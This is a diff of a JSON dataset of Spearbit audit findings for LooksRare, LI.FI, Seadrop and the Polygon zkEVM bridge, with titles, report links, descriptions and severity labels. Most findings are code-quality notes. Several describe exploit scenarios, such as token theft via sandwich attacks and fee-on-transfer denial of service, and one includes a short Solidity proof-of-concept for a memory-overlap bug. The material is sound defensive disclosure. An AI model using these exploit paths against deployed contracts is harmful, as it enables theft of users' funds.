not extend IERC721 interface", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "The current interface IERC721ContractMetadata does not include the ERC-721 functions. As a comparision, OpenZeppelin's IERC721Metadata.sol extends the IERC721 interface.", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Informational" ] }, { - "title": "_verifyMerkleProofOrOrderHash can be simplified", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "_verifyMerkleProofOrOrderHash includes a if/else block that calls into _computeDigestAndVer- ify with almost the same inputs (only the hash is different).", + "title": "Add unit tests for mintSigned and mintAllowList in SeaDrop", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "The only test for the mintSigned and the mintAllowList functions are fuzz tests.", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Informational" ] }, { - "title": "isOperatorValidForTransfer can be modified to refactor more of the logic", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "isOperatorValidForTransfer is only used to revert if necessary. The logic around the revert decision on all call sites.", + "title": "Rename a variable with a misleading name", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "enumeratedDropsLength variable name in SeaDrop._removeFromEnumeration is a bit misleading since _removeFromEnumeration is used also for signer lists, feeRecipient lists, etc..", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Informational" ] }, { - "title": "Keep maximum allowed number of characters per line to 120.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "There are a few long lines in the code base. contracts/executionStrategies/StrategyCollectionOffer.sol 21:2 27:2 29:2 30:2 67:2 69:2 70:2 118:2 119:2 error error error error error error error error error Line length must be no more than 120 but current length is 127 Line length must be no more than 120 but current length is 163 Line length must be no more than 120 but current length is 121 Line length must be no more than 120 but current length is 121 Line length must be no more than 120 but current length is 163 Line length must be no more than 120 but current length is 121 Line length must be no more than 120 but current length is 121 Line length must be no more than 120 but current length is 123 Line length must be no more than 120 but current length is 121 max-line-length max-line-length max-line-length max-line-length max-line-length max-line-length max-line-length max-line-length max-line-length contracts/executionStrategies/StrategyDutchAuction.sol 20:2 22:2 23:2 26:5 70:31 85:2 86:2 92:5 error error error warning warning error error warning Line length must be no more than 120 but current length is 163 Line length must be no more than 120 but current length is 121 Line length must be no more than 120 but current length is 121 Function has cyclomatic complexity 9 but allowed no more than 7 Avoid to make time-based decisions in your business logic Line length must be no more than 120 but current length is 123 Line length must be no more than 120 but current length is 121 Function has cyclomatic complexity 8 but allowed no more than 7 max-line-length max-line-length max-line-length code-complexity not-rely-on-time max-line-length max-line-length code-complexity contracts/executionStrategies/StrategyItemIdsRange.sol 15:2 20:2 21:2 22:2 23:2 25:5 100:2 101:2 error error error error error warning error error Line length must be no more than 120 but current length is 142 Line length must be no more than 120 but current length is 163 Line length must be no more than 120 but current length is 163 Line length must be no more than 120 but current length is 121 Line length must be no more than 120 but current length is 121 Function has cyclomatic complexity 12 but allowed no more than 7 Line length must be no more than 120 but current length is 123 Line length must be no more than 120 but current length is 121 max-line-length max-line-length max-line-length max-line-length max-line-length code-complexity max-line-length max-line-length contracts/helpers/OrderValidatorV2A.sol 40:2 ,! 53:2 ,! error Line length must be no more than 120 but current length is 121 error Line length must be no more than 120 but current length is 121 max-line-length max-line-length 69 225:2 ,! 279:2 ,! 498:24 ,! 501:26 ,! 511:2 ,! 593:5 ,! 662:5 ,! 758:5 ,! 830:5 ,! 843:17 ,! 850:17 ,! 906:5 ,! 963:5 ,! 12:2 ,! 18:2 ,! 23:2 ,! 49:5 ,! 81:2 ,! 144:2 ,! error Line length must be no more than 120 but current length is 127 max-line-length error Line length must be no more than 120 but current length is 127 max-line-length warning Avoid to make time-based decisions in your business logic not-rely-on-time warning Avoid to make time-based decisions in your business logic not-rely-on-time error Line length must be no more than 120 but current length is 143 max-line-length warning Function has cyclomatic complexity 9 but allowed no more than 7 warning Function has cyclomatic complexity 9 but allowed no more than 7 code-complexity code-complexity warning Function order is incorrect, internal view function can not go after internal pure function (line 727) ordering warning Function has cyclomatic complexity 10 but allowed no more than 7 code-complexity warning Avoid to use inline assembly. It is acceptable only in rare cases no-inline-assembly warning Avoid to use inline assembly. It is acceptable only in rare cases warning Function has cyclomatic complexity 8 but allowed no more than 7 no-inline-assembly code-complexity warning Function has cyclomatic complexity 8 but allowed no more than 7 code-complexity contracts/helpers/ValidationCodeConstants.sol 17:2 18:2 error error Line length must be no more than 120 but current length is 129 Line length must be no more than 120 but current length is 121 max-line-length max-line-length contracts/interfaces/ILooksRareProtocol.sol 160:2 error Line length must be no more than 120 but current length is 122 max-line-length contracts/libraries/OrderStructs.sol error Line length must be no more than 120 but current length is 292 max-line-length error Line length must be no more than 120 but current length is 292 max-line-length error Line length must be no more than 120 but current length is 127 max-line-length warning Function order is incorrect, struct definition can not go after state variable declaration (line 26) ordering error Line length must be no more than 120 but current length is 128 max-line-length error Line length must be no more than 120 but current length is 131 max-line-length 49 problems (34 errors, 15 warnings)", + "title": "The protocol rounds the fees in the favour of creatorPaymentAddress", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "The feeAmount calculation rounds down, i.e., rounds in the favour of creatorPaymentAddress and against feeRecipient. For a minuscule amount of ETH (price such that price * feeBps < 10000), the fees received by the feeRecipient would be 0. An interesting case here would be if the value quantity * price * feeBps is greater than or equal to 10000 and price * feeBps < 10000. In this case, the user can split the mint transaction into multiple transactions to skip the fees. However, this is unlikely to be profitable, considering the gas overhead involved as well as the minuscule amount of savings.", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Informational" ] }, { - "title": "avoid transferring in _transferFungibleTokens when sender and recipient are equal", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "Currently, there is no check in _transferFungibleTokens to avoid transferring funds from sender to recipient when they are equal. There is only one check outside of _transferFungibleTokens when one wants to transfer to an affiliate. But if the bidUser is the creator, or the ask recipient or the protocolFeeRecipient, the check is missing.", + "title": "Consider using type(uint).max as the magic value for maxTokenSupplyForStage instead of 0", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "The value 0 is currently used as magic value to mean that maxTokenSupplyForStage to mean that the check quantity + currentTotalSupply > maxTokenSupplyForStage. However, the value type(uint).max is a more appropriate magic value in this case. This also avoids the need for additional branching if (maxTo- kenSupplyForStage != MAGIC_VALUE) as the condition quantity + currentTotalSupply > type(uint).max is never true.", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Informational" ] }, { - "title": "Keep the order of parameters consistent in updateStrategy", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "In updateStrategy, isActive is set first when updating storage, and it's the second parameter when supplied to the StrategyUpdated event. But it is the last parameter supplied to updateStrategy.", + "title": "Missing edge case tests on uninitialized AllowList", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "The default value for _allowListMerkleRoots[nftContract] is 0. A transaction that tries to mint an NFT in this case with an empty proof (or any other proof) should revert. There were no tests for this case.", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Informational" ] }, { - "title": "_transferFungibleTokens does not check whether the amount is 0", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "_transferFungibleTokens does not check whether amount is 0 to skip transferring to recipient. For the ask recipient and creator amounts the check is performed just before calling this function. But the check is missing for the affiliate and protocol fees.", + "title": "Consider naming state variables as public to replace the user-defined getters", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "Several state variables, for example, mapping(address => PublicDrop) private _publicDrops; but have corresponding getters defined (function getPublicDrop(address have private visibility, nftContract)). Replacing private by public and renaming the variable name can decrease the code. There are several examples of the above pattern in the codebase, however we are only listing one here for brevity.", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Informational" ] }, { - "title": "StrategyItemIdsRange.executeStrategyWithTakerAsk - Maker's bid amount might be entirely ful- filled by a single ERC1155 item", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "StrategyItemIdsRange allows a buyer to specify a range of potential item ids (both ERC721 and ERC1155) and a desired amount, then a seller can match the buyer's request by picking a subset of items from the provided range so that the desired amount of items are eventually fulfilled. a taker might pick a single ERC1155 item id from the range and fulfill the entire order with multiple instances of that same item.", + "title": "Use bytes.concat instead of abi.encodePacked for concatenation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "While one of the uses of abi.encodePacked is to perform concatenation, the Solidity language does contain a reserved function for this: bytes.concat.", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Informational" ] }, { - "title": "Define named constants", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": " ExecutionManager.sol#L289 : 0x7476320f is cast sig \"OutsideOfTimeRange()\" TransferSelectorNFT.sol#L30 : 0xa7bc96d3 is cast sig \"transferItemsERC721(address,address,address,uint256[],uint256[])\" and can be replaced by TransferManager.transferItemsERC721.selector TransferSelectorNFT.sol#L31 : 0xa0a406c6 is cast sig \"transferItemsERC1155(address,address,address,uint256[],uint256[])\" and can be replaced by TransferManager.transferItemsERC1155.selector.", + "title": "Misleading comment", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "The comment says // Check that the sender is the owner of the allowedNftTokenId.. However, minter isn't necessarily the sender due to how it's set: address minter = minterIfNotPayer != address(0) ? minterIfNotPayer : msg.sender;.", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Informational" ] }, { - "title": "price validation in executeStrategyWithTakerAsk, executeCollectionStrategyWithTakerAsk and executeCollectionStrategyWithTakerAskWithProof can be relaxed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "In the above context, a maker is bidding a maximum price pmax and a taker is asking a minimum price pmin, the strategy should calculate a price p in the range [pmin, pmax ] and so we would need to have pmin (cid:20) pmax . The above strategies pick the execution price to be pmax (the maximum price bid by the maker), and since the taker is the caller to the protocol we would only need to require pmin (cid:20) pmax . But the current requirement is pmin = pmax . if ( ... || makerBid.maxPrice != takerAsk.minPrice) { revert OrderInvalid(); }", + "title": "Use i instead of j as an index name for a non-nested for-loop", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "Using an index named j instead of i is confusing, as this naming convention makes developers expect that the for-loop is nested, but this is not the case. Using i is more standard and less surprising.", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Informational" ] }, { - "title": "Change occurances of whitelist to allowlist and blacklist to blocklist", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "In the codebase, whitelist (blacklist) is used to represent entities or objects that are allowed (denied) to be used or perform certain tasks. This word is not so accurate/suggestive and also can be offensive.", + "title": "Avoid duplicating code for consistency", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "The _checkActive function is used in every mint function besides mintPublic where the code is almost the same.", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Informational" ] }, { - "title": "Add more documentation on expected priceFeed decimals", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "The Chainlink strategies are making the following assumptions 1. All priceFeeds in StrategyFloorFromChainlink have a decimals value of 18. 2. The priceFeed in StrategyUSDDynamicAsk has a decimals value of 8. Any priceFeed that is added that does not match these assumptions would lead to incorrect calculations.", + "title": "restrictFeeRecipients is always true for either PublicDrop or TokenGatedDrop in ERC721SeaDrop", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "restrictFeeRecipients is always true for either PublicDrops or TokenGatedDrops. When either one of these drops gets created/updated by calling one of the four functions below on a ERC721SeaDrop contract, its value is hardcoded as true: updatePublicDrop updatePublicDropFee updateTokenGatedDrop updateTokenGatedDropFee", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Informational" ] }, { - "title": "Code duplicates", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "* In some places, Chainlink staleness is checked using block.timestamp - updatedAt > maxLa- tency, and in other places it is checked using block.timestamp > maxLatency + updatedAt. Consider refactor- ing this code into a helper function. Otherwise, it would be better to use only one version of the two code snippets across the protocol. The validation check to match assetType with the actual amount of items being transferred is duplicated among the different strategies instead of being implemented at a higher level once, such as in a common function or class that can be reused among the different strategies. _executeStrategyForTakerAsk and _executeStrategyForTakerBid almost share the same code. TakerBid, TakerAsk can be merged into a single struct. MakerBid, MakerAsk can be merged into a single struct.", + "title": "Reformat lines for better readability", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "These lines are too long to be readable. A mistake isn't easy to spot.", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Informational" ] }, { - "title": "Low level calls are not recommended as they lack type safety and won't revert for calls to EOAs", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "Low-level calls are not recommended for interaction between different smart contracts in modern versions of the compiler, mainly because they lack type safety, return data size checks, and won't revert for calls to Externally Owned Accounts.", + "title": "Comment is a copy-paste", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": "This comment is exactly the same as this one. This is a copy-paste mistake.", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Informational" ] }, { - "title": "Insufficient input validation of orders (especially on the Taker's side)", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "There is a lack of consistency in the validation of parameters, as some fields of the taker's order are checked against the maker's order while others are not. It is worth noting that we have not identified any significant impact caused by this issue. Missing validation of strategyId Missing validation of collection Most strategies only validate length mismatches on one side of the order. Also, they don't usually validate that the lengths match between both sides. For example, in the DutchAuction strategy, if the makerAsk has itemIds and amounts arrays of length 2 and 2, then it would be perfectly valid for the takerBid to use itemIds and amounts arrays of length 5 and 7, as long as the first two elements of both arrays match what is expected. (FYI: I filed a related issue for the ItemIdsRange strategy, which I think is more severe of an issue because the mismatched lengths can actually be returned from the function).", + "title": "Usage of floating pragma is not recommended", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", + "body": " 0.8.11 is declared in files. In foundry.toml: solc_version = '0.8.15' is used for the default build profile. In hardhat.config.ts and hardhat-coverage.config.ts: \"0.8.14\" is used. 31", "labels": [ "Spearbit", - "LooksRare", + "Seadrop", "Severity: Informational" ] }, { - "title": "LooksRareProtocol's owner can take maker's tokens for signed orders with unimplemented strat- egyIds", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "If a maker signs an order that uses a strategyId that hasn't been added to the protocol yet, the protocol owner can add a malicious strategy afterward such that a taker would be able to provide no fulfillment but take all the offers.", + "title": "Funds can be sent to a non existing destination", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The function bridgeAsset() and bridgeMessage() do check that the destination network is different If accidentally the wrong than the current network. However, they dont check if the destination network exists. networkId is given as a parameter, then the function is sent to a nonexisting network. If the network would be deployed in the future the funds would be recovered. However, in the meantime they are inaccessible and thus lost for the sender and recipient. Note: other bridges usually have validity checks on the destination. function bridgeAsset(...) ... { require(destinationNetwork != networkID, ... ); ... } function bridgeMessage(...) ... { require(destinationNetwork != networkID, ... ); ... }", "labels": [ "Spearbit", - "LooksRare", - "Severity: Informational" + "zkEVM-bridge", + "Severity: Medium Risk" ] }, { - "title": "Strategies with faulty price feeds can have unwanted consequences", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "In LooksRare protocol once a strategy has been added its implementation and selector cannot be updated. This is a good since users who sign their MakerBid or MakerAsk can trustlessly examine the strategy implementation before including them into their orders. Some strategies might depend on other actors such as price feeds. This is the case for StrategyUSDDynamicAsk and StrategyFloorFromChainlink. If for some reason these price feeds do not return the correct prices, these strategies can have a slight deviation from their original intent. Case StrategyUSDDynamicAsk If the price feed returns a lower price, a taker can bid on an order with that lower price. This scenario is guarded by MakerAsk's minimum price. But the maker would not receive the expected amount if the correct price was reported and was greater than the maker's minimum ask. Case StrategyFloorFromChainlink For executeFixedDiscountCollectionOfferStrategyWithTakerAsk and executeBasisPointsDiscountCollec- tionOfferStrategyWithTakerAsk if the price feeds reports a floor price higher than the maker's maximum bid price, the taker can match with the maximum bid. Thus the maker ends up paying more than the actual floor adjusted by the discount formula. For executeFixedPremiumStrategyWithTakerBid and executeBasisPointsPremiumStrategyWithTakerBid if the price feeds report a floor price lower than the maker's minimum ask price, the taker can match with the minimum ask price and pay less than the actual floor price (adjusted by the premium).", + "title": "Fee on transfer tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The bridge contract will not work properly with a fee on transfer tokens 1. User A bridges a fee on transfer Token A from Mainnet to Rollover R1 for amount X. 2. In that case X-fees will be received by bridge contract on Mainnet but the deposit receipt of the full amount X will be stored in Merkle. 3. The amount is claimed in R1 and a new TokenPair for Token A is generated and the full amount X is minted to User A 4. Now the full amount is bridged back again to Mainnet 5. When a claim is made on Mainnet then the contract tries to transfer amount X but since it received the amount X-fees it will use the amount from other users, which eventually causes DOS for other users using the same token", "labels": [ "Spearbit", - "LooksRare", - "Severity: Informational" + "zkEVM-bridge", + "Severity: Medium Risk" ] }, { - "title": "The provided price to IERC2981.royaltyInfo does not match the specifications", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "royaltyFeeRegistry.royaltyInfo does not return a non-zero creator address, we check whether the collection supports IERC2981 and if it does, we loop over each itemId and call the collection's royaltyInfo endpoint. But the input price parameters provided to this endpoint do not match the specification of EIP-2981: CreatorFeeManagerWithRoyalties, CreatorFeeManagerWithRebates and /// @param _salePrice - the sale price of the NFT asset specified by _tokenId 78 The price provided in viewCreatorFeeInfo functions, is the price for the whole batch of itemIds and not the individual tokens itemIds[i] provided to the royaltyInfo endpoint. Even if the return values (newCreator, newCreatorFee) would all match, it would not mean that newCreatorFee should be used as the royalty for the whole batch. An example is that if the royalty is not percentage-based, but a fixed price.", + "title": "Function consolidatePendingState() can be executed during emergency state", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The function consolidatePendingState() can be executed by everyone even when the contract is in an emergency state. This might interfere with cleaning up the emergency. Most other functions are disallowed during an emergency state. function consolidatePendingState(uint64 pendingStateNum) public { if (msg.sender != trustedAggregator) { require(isPendingStateConsolidable(pendingStateNum),...); } _consolidatePendingState(pendingStateNum); }", "labels": [ "Spearbit", - "LooksRare", - "Severity: Informational" + "zkEVM-bridge", + "Severity: Medium Risk" ] }, { - "title": "Replace the abi.encodeWithSelector with abi.encodeCall to ensure type and typo safety", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "In the context above, abi.encodeWithSelector is used to create the call data for a call to an external contract. This function does not guarantee that mismatched types are used for the input parameters.", + "title": "Sequencers can re-order forced and non-forced batches", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "Sequencers have a certain degree of control over how non-forced and forced batches are ordered. Consider the case where we have two sets of batches; non-forced (NF) and forced (F). A sequencer can order the following sets of batches (F1, F2) and (NF1, NF2) in any order so as long as the order of the forced batch and non-forced batch sets are kept in order. i.e. A sequencer can sequence batches as F1 -> NF1 -> NF2 -> F2 but they can also equivalently sequence these same batches as NF1 -> F1 -> F2 -> NF2.", "labels": [ "Spearbit", - "LooksRare", - "Severity: Informational" + "zkEVM-bridge", + "Severity: Low Risk" ] }, { - "title": "Use the inline keccak256 with the formatting suggested when defining a named constant for an EIP-712 type hash", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", - "body": "Hardcoded byte32 EIP-712 type hashes are defined in the OrderStructs library.", + "title": "Check length of smtProof", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "An obscure Solidity bug could be triggered via a call in solidity 0.4.x. Current solidity versions revert with panic 0x41. The problem could occur if unbounded memory arrays were used. This situation happens to be the case as verifyMerkleProof() (and all the functions that call it) dont check the length of the array (or loop over the entire array). It also depends on memory variables (for example structs) being used in the functions, that doesnt seem to be the case. Here is a POC of the issue which can be run in remix // SPDX-License-Identifier: MIT // based on https://github.com/paradigm-operations/paradigm-ctf-2021/blob/master/swap/private/Exploit.sol , pragma solidity ^0.4.24; // only works with low solidity version import \"hardhat/console.sol\"; contract test{ struct Overlap { uint field0; } function mint(uint[] memory amounts) public { Overlap memory v; console.log(\"before: \",amounts[0]); v.field0 = 567; console.log(\"after: \",amounts[0]); // would expect to be 0 however is 567 } function go() public { // this part requires the low solidity version bytes memory payload = abi.encodeWithSelector(this.mint.selector, 0x20, 2**251); bool success = address(this).call(payload); console.log(success); } }", "labels": [ "Spearbit", - "LooksRare", - "Severity: Informational" + "zkEVM-bridge", + "Severity: Low Risk" ] }, { - "title": "Hardcode bridge addresses via immutable", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Most bridge facets call bridge contracts where the bridge address has been supplied as a parameter. This is inherently unsafe because any address could be called. Luckily, the called function signature is hardcoded, which reduces risk. However, it is still possible to call an unexpected function due to the potential collisions of function signatures. Users might be tricked into signing a transaction for the LiFi protocol that calls unexpected contracts. One exception is the AxelarFacet which sets the bridge addresses in initAxelar(), however this is relatively expensive as it requires an SLOAD to retrieve the bridge addresses. Note: also see \"Facets approve arbitrary addresses for ERC20 tokens\". function startBridgeTokensViaOmniBridge(..., BridgeData calldata _bridgeData) ... { ... _startBridge(_lifiData, _bridgeData, _bridgeData.amount, false); } function _startBridge(..., BridgeData calldata _bridgeData, ...) ... { IOmniBridge bridge = IOmniBridge(_bridgeData.bridge); if (LibAsset.isNativeAsset(_bridgeData.assetId)) { bridge.wrapAndRelayTokens{ ... }(...); } else { ... bridge.relayTokens(...); } ... } contract AxelarFacet { function initAxelar(address _gateway, address _gasReceiver) external { ... s.gateway = IAxelarGateway(_gateway); s.gasReceiver = IAxelarGasService(_gasReceiver); } function executeCallViaAxelar(...) ... { ... s.gasReceiver.payNativeGasForContractCall{ ... }(...); s.gateway.callContract(destinationChain, destinationAddress, payload); } }", + "title": "Transaction delay due to free claimAsset() transactions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The sequencer rst processes the free claimAsset() transaction and then the rest. This might delay other transactions if there are many free claimAsset() transactions. As these transactions would have to be initiated on the mainnet, the gas costs there will reduce this problem. However, once multiple rollups are supported in the future the transactions could originate from another rollup with low gas costs. func (s *Sequencer) tryToProcessTx(ctx context.Context, ticker *time.Ticker) { ... appendedClaimsTxsAmount := s.appendPendingTxs(ctx, true, 0, getTxsLimit, ticker) // `claimAsset()` transactions , appendedTxsAmount := s.appendPendingTxs(ctx, false, minGasPrice.Uint64(), getTxsLimit-appendedClaimsTxsAmount, ticker) + appendedClaimsTxsAmount , ... }", "labels": [ "Spearbit", - "LIFI", - "Severity: High Risk" + "zkEVM-bridge", + "Severity: Low Risk" ] }, { - "title": "Tokens are left in the protocol when the swap at the destination chain fails", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "LiFi protocol finds the best bridge route for users. In some cases, it helps users do a swap at the destination chain. With the help of the bridge protocols, LiFi protocol helps users trigger swapAndComplete- BridgeTokensVia{Services} or CompleteBridgeTokensVia{Services} at the destination chain to do the swap. Some bridge services will send the tokens directly to the receiver address when the execution fails. For example, Stargate, Amarok and NXTP do the external call in a try-catch clause and send the tokens directly to the receiver If the receiver is the Executor contract, when it fails. The tokens will stay in the LiFi protocols in this scenario. users can freely pull the tokens. Note: Exploiters can pull the tokens from LiFi protocol, Please refer to the issue Remaining tokens can be sweeped from the LiFi Diamond or the Executor , Issue #82 Exploiters can take a more aggressive strategy and force the victims swap to revert. A possible exploit scenario: A victim wants to swap 10K optimisms BTC into Ethereum mainnet USDC. Since dexs on mainnet have the best liquidity, LiFi protocol helps users to the swap on mainnet The transaction on the source chain (optimism) suceed and the Bridge services try to call Complete- BridgeTokensVia{Services} on mainnet. The exploiter builds a sandwich attack to pump the BTC price. The CompleteBridgeTokens fails since the price is bad. The bridge service does not revert the whole transaction. Instead, it sends the BTC on the mainnet to the receiver (LiFi protocol). The exploiter pulls tokens from the LiFi protocol.", + "title": "Misleading token addresses", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The function claimAsset() deploys TokenWrapped contracts via create2 and a salt. This salt is based on the originTokenAddress. By crafting specic originTokenAddresses, its possible to create vanity addresses on the other chain. These addresses could be similar to legitimate tokens and might mislead users. Note: it is also possible to directly deploy tokens on the other chain with vanity addresses (e.g. without using the bridge) function claimAsset(...) ... { ... bytes32 tokenInfoHash = keccak256(abi.encodePacked(originNetwork, originTokenAddress)); ... TokenWrapped newWrappedToken = (new TokenWrapped){ salt: tokenInfoHash }(name, symbol, decimals); ... } 8", "labels": [ "Spearbit", - "LIFI", - "Severity: High Risk" + "zkEVM-bridge", + "Severity: Low Risk" ] }, { - "title": "Tokens transferred with Axelar can get lost if the destination transaction cant be executed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "If _executeWithToken() reverts then the transaction can be retried, possibly with additional gas. See axelar recovery. However there is no option to return the tokens or send them elsewhere. This means that tokens would be lost if the call cannot be made to work. contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function _executeWithToken(...) ... { ... (bool success, ) = callTo.call(callData); if (!success) revert ExecutionFailed(); } }", + "title": "Limit amount of gas for free claimAsset() transactions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "Function claimAsset() is subsidized (e.g. gasprice is 0) on L2 and allows calling a custom contract. This could be misused to execute elaborate transactions for free. Note: safeTransfer could also call a custom contract that has been crafted before and bridged to L1. Note: this is implemented in the Go code, which detects transactions to the bridge with function bridgeClaimMethodSignature == \"0x7b6323c1\", which is the selector of claimAsset(). See function IsClaimTx() in transaction.go. function claimAsset(...) ... { ... (bool success, ) = destinationAddress.call{value: amount}(new bytes(0)); ... IERC20Upgradeable(originTokenAddress).safeTransfer(destinationAddress,amount); ... }", "labels": [ "Spearbit", - "LIFI", - "Severity: High Risk" + "zkEVM-bridge", + "Severity: Low Risk" ] }, { - "title": "Use the getStorage() / NAMESPACE pattern instead of global variables", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The facet DexManagerFacet and the inherited contracts Swapper.sol / SwapperV2.sol define a global variable appStorage on the first storage slot. These two overlap, which in this case is intentional. However it is dangerous to use this construction in a Diamond contract as this uses delegatecall. If any other contract uses a global variable it will overlap with appStorage with unpredictable results. This is especially impor- tant because it involves access control. For example if the contract IAxelarExecutable.sol were to be inherited in a facet, then its global variable gateway would overlap. Luckily this is currently not the case. contract DexManagerFacet { ... LibStorage internal appStorage; ... } contract Swapper is ILiFi { ... LibStorage internal appStorage; // overlaps with DexManagerFacet which is intentional ... }", + "title": "What to do with funds that cant be delivered", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "Both claimAsset() and claimMessage() might revert on different locations (even after retrying). Although the funds stay in the bridge, they are not accessible by the originator or recipient of the bridge action. So they are essentially lost for the originator and recipient. Some other bridges have recovery addresses where the funds can be delivered instead. Here are several potential revert situations: 9 function claimAsset(...) ... { ... (bool success, ) = destinationAddress.call{value: amount}(new bytes(0)); require(success, ... ); ... IERC20Upgradeable(originTokenAddress).safeTransfer(destinationAddress,amount); ... TokenWrapped newWrappedToken = (new TokenWrapped){ salt: tokenInfoHash }(name, symbol, decimals); ... } function claimMessage(...) ... { ... (bool success, ) = destinationAddress.call{value: amount}( abi.encodeCall( IBridgeMessageReceiver.onMessageReceived, (originAddress, originNetwork, metadata) ) ); require(success, \"PolygonZkEVMBridge::claimMessage: Message failed\"); ... }", "labels": [ "Spearbit", - "LIFI", - "Severity: High Risk" + "zkEVM-bridge", + "Severity: Low Risk" ] 